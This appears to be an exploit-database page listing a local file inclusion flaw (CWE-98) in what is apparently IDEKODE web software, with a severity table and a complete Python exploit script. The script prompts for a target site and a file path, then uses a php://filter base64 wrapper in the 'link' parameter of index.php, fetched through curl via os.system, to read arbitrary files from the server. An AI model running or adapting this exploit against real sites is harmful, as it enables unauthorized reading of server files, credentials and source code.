Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-98 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Local | 2020-12-10 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N | 0.8 | 0.95 |
Original : https://cxsecurity.com/issue/WLB-2020080031 Exploit: https://github.com/Proxysec/IDEKODE-LFI/blob/main/exploit.py Exploit raw: import requests import os def banner(): print(f"""" _________ ______ _______ _ _______ ______ _______ _ _______ _________ \__ __/( __ \ ( ____ \| \ /\( ___ )( __ \ ( ____ \( \ ( ____ \\__ __/ ) ( | ( \ )| ( \/| \ / /| ( ) || ( \ )| ( \/| ( | ( \/ ) ( | | | | ) || (__ | (_/ / | | | || | ) || (__ | | | (__ | | | | | | | || __) | _ ( | | | || | | || __) | | | __) | | | | | | ) || ( | ( \ \ | | | || | ) || ( | | | ( | | ___) (___| (__/ )| (____/\| / \ \| (___) || (__/ )| (____/\| (____/\| ) ___) (___ \_______/(______/ (_______/|_/ \/(_______)(______/ (_______/(_______/|/ \_______/ | Exploiter by Nano | ORG : https://cxsecurity.com/issue/WLB-2020080031 """) def exploit(): try: banner() x = input("Site: ") url = x+'' p = requests.get(url+'index.php?link=php://filter/convert.base64-encode/resource=&id=8') if p.status_code == 404: print("Site is not Vuln") return else: o = input("LFI: ") pay = o os.system(f"curl {url}index.php?link=php://filter/convert.base64-encode/resource={pay}&id=8 | base64 -d") print("Look For the base64 hash ends with ==") except: print(f"Something went wrong {url}") #LFI() return exploit()
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.